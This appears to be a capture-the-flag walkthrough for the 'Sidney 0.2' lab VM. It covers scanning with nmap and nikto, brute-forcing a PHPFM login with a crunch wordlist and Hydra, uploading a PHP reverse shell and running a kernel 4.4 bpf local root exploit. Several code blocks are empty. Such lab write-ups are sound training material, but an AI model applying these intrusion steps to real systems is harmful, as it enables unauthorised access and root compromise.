Sidney:0.2
Tools:
- netdiscover
- Nmap
- Wfuzz
- Nikto
- Burp Suite
- Hydra
Vulnerabilities:
- PHPFM Arbitrary File Upload
- Linux Kernel 4.4.x (Ubuntu 16.04) - ‘double-fdput()’ in bpf(BPF_PROG_LOAD) Local Root Exploit
Use netdiscover to detect target IP address
netdiscover -i eth0 -r 192.168.41.0/24
192.168.41.153 is the target.
Then run nmap to detect opening ports and running services on the target machine.
nmap -sV -v -O -A -T5 192.168.41.153 -p-
Only port 80 is opening.
use nikto to scan
nikto -h 192.168.41.153
No useful info come out.
1
| |
still same thing.
check the http://192.168.41.153, find a picture,
check the picture info:
find a path: http://192.168.41.153/commodore64/
now use nikto to scan that path,
nikto -h http://192.168.41.153/commodore64/
find an interesting file index.php,
check that file,
get the login page, and the CMS seems PHPFM
searchsploit PHPFM
find a PHPFM Arbitrary File Upload, now I need to find a way to upload the shell. First, I have to get the access to the PHPFM
In http://192.168.41.153/commodore64, I found:
I will try robhubbard as username. Password a C64 sound chip lowercase 3letters4digits without spaces… After checking wikipedia and more sites, seems that MOS is one of the sound chips (3 letters) Time to make our dictionary with MOS + 4 numbers and minimum+maximum of 7 words.
crunch 7 7 -t mos%%%% > test.txt
before using hydra to crack password, I use Burp to get incorrect login response,
1
| |
get the password mos6518
login, get the page:
set up netcat and go to http://192.168.41.153/commodore64/reverse.php
get the shell:
Since the Linux kernel version here is 4.4.0
searchsploit 4.4 | grep linux
exploit found Linux Kernel 4.4.x (Ubuntu 16.04) - double-fdput() in bpf(BPF_PROG_LOAD) Local Root Exploit
In Kali:
1 2 | |
In target:
upload the 39772.zip via phpfm, in the shell
find / -name 39772.zip
shows the file in /var/www/html/commodore64/
1 2 3 4 5 6 7 | |
get the root:
